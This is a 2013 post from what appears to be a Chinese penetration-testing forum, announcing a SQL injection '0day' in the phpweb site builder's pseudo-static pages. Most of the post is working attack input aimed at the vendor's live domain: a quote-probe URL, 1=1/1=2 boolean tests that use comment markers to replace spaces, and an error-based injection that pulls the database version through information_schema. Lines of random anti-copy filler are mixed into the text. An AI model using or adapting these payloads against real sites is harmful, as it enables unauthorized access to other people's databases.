找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpweb伪静态页面注入0day
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2156|回复: 0
打印 上一主题 下一主题

phpweb伪静态页面注入0day

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-4 19:46:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
phpweb所有的整站程序伪静态页面都存在sql注入! ?( _. i2 d5 G+ @

5 }' k2 U* X0 A9 D% {主站:http://phpweb.net/
# B" T( E8 ?9 i$ p/ g, K& y加’检测:
2 o: L3 r2 c( O# e/ v! E) t ) i: d/ Y3 k- }/ d/ i. N" p. `2 h
http://www.phpweb.net/down/html/?772′.html/ ?$ l3 O/ D1 C0 S

/ K: X; h0 e9 G7 f* R出错' R  S/ T. n& M/ j
存在注入。
# _8 c$ i8 `0 \& _/ @9 I不能用空格,只能用/*罗
$ O4 M* s8 E5 s. \, z" z( jhttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常4 X& M# @/ \0 j$ }

7 E# K3 O+ u# y4 T- S. mhttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
* I7 N0 C/ d! x8 T( a爆数据库版本:* }- _9 c  D+ g. p  A2 X5 D

6 B4 |% ~3 h4 q2 Y0 T" m' S?* }9 z' d! T0 ]' K) A* x
1
# i  a; t# o9 [4 Phttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
; ?% c( Z0 i! `! [" U1 X0 L更新日期: 2013-01-03 13:39:50        
! g- p+ a& G' w) @% u* Q0 \
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表